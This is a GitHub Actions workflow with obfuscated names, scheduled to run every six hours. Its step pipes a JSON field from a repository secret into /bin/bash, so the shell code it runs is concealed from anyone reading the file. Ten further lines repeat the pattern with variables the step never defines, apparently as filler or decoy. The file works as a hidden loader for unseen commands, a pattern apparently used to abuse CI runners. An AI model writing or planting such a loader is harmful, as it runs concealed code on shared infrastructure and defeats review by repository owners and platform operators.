name: bishasx

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bishasx
        env:
          gds314: ${{ secrets.gds314 }}
        run: |
          echo $gds314 | jq -r .f8 | /bin/bash
          echo $ngtfq2120 | jq -r .fehqs070 | /bin/bash
          echo $aaoa2453 | jq -r .hixrc3 | /bin/bash
          echo $obdgs954 | jq -r .kor7 | /bin/bash
          echo $vld21249 | jq -r .axy5 | /bin/bash
          echo $yd6951 | jq -r .ehzj107 | /bin/bash
          echo $zi6 | jq -r .xo3721 | /bin/bash
          echo $dqm243 | jq -r .ag1855 | /bin/bash
          echo $hmua4379 | jq -r .uwo7 | /bin/bash
          echo $z8 | jq -r .rmov2215 | /bin/bash
          echo $iow7 | jq -r .iw56501 | /bin/bash

